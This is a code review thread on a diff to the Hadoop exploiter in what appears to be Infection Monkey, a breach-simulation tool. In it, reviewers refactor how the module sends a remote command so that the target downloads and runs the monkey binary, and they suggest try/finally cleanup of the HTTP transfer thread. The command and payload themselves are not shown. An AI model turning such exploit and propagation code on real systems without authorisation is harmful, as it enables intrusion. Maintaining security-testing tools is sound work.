monkey/infection_monkey/exploit/hadoop.py

```diff
@@ -33,29 +33,28 @@ class HadoopExploiter(WebRCE):
     # Random string's length that's used for creating unique app name
     RAN_STR_LEN = 6
 
-    def __init__(self, host):
-        super(HadoopExploiter, self).__init__(host)
+    def __init__(self):
+        super(HadoopExploiter, self).__init__()
 
     def _exploit_host(self):
         # Try to get exploitable url
         urls = self.build_potential_urls(self.host.ip_addr, self.HADOOP_PORTS)
         self.add_vulnerable_urls(urls, True)
         if not self.vulnerable_urls:
-            return False
-        # We presume hadoop works only on 64-bit machines
-        if self.host.os["type"] == "windows":
-            self.host.os["machine"] = "64"
+            return self.exploit_result
         paths = self.get_monkey_paths()
         if not paths:
-            return False
+            return self.exploit_result
         http_path, http_thread = HTTPTools.create_locked_transfer(self.host, paths["src_path"])
-        command = self.build_command(paths["dest_path"], http_path)
+        command = self._build_command(paths["dest_path"], http_path)
         if not self.exploit(self.vulnerable_urls[0], command):
-            return False
+            return self.exploit_result
         http_thread.join(self.DOWNLOAD_TIMEOUT)
         http_thread.stop()
```

Comment:
Hmmm, shouldn't this happen regardless of success/failure?

Reply:
Yeah. Let's wrap it in a `try/finally`.

Reply:
Yeah. I recommend something like this:

```python
        paths = self.get_monkey_paths()
        if not paths:
            return self.exploit_result

        http_path, http_thread = HTTPTools.create_locked_transfer(self.host, paths["src_path"])

        try:
            command = self._build_command(paths["dest_path"], http_path)

            if self.exploit(self.vulnerable_urls[0], command):
                self.add_executed_cmd(command)
                self.exploit_result.exploitation_success = True
                self.exploit_result.propagation_success = True
        finally:
            http_thread.join(self.DOWNLOAD_TIMEOUT)
            http_thread.stop()

        return self.exploit_result
```